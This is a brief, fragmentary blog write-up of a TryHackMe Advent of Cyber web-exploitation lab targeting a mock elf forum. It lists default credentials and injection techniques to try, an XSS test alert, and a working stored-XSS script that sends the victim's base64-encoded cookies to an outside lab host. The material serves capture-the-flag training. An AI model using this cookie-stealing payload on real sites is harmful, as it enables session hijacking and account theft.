[Day 5] Web Exploitation Pesky Elf Forum TryHackMe Advent Of Cyber

introduction

username: McSkidy
password: password
  1. SQL Injection
  2. NOSQL injection
  3. LDAP Injection
  4. XPATH Injection
  5. Default credentials
  6. perform a brute force attack (Which 99% of the time i really don’t recommend)
<script> alert(document.domain);</script>
<script>
var url = "http://10.8.2.58:8000/";
var req = new XMLHttpRequest();
req.open('GET', url +'/musyoka?cookie=' + btoa(document.cookie), true);
req.withCredentials = true;
req.send();
</script>
t

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store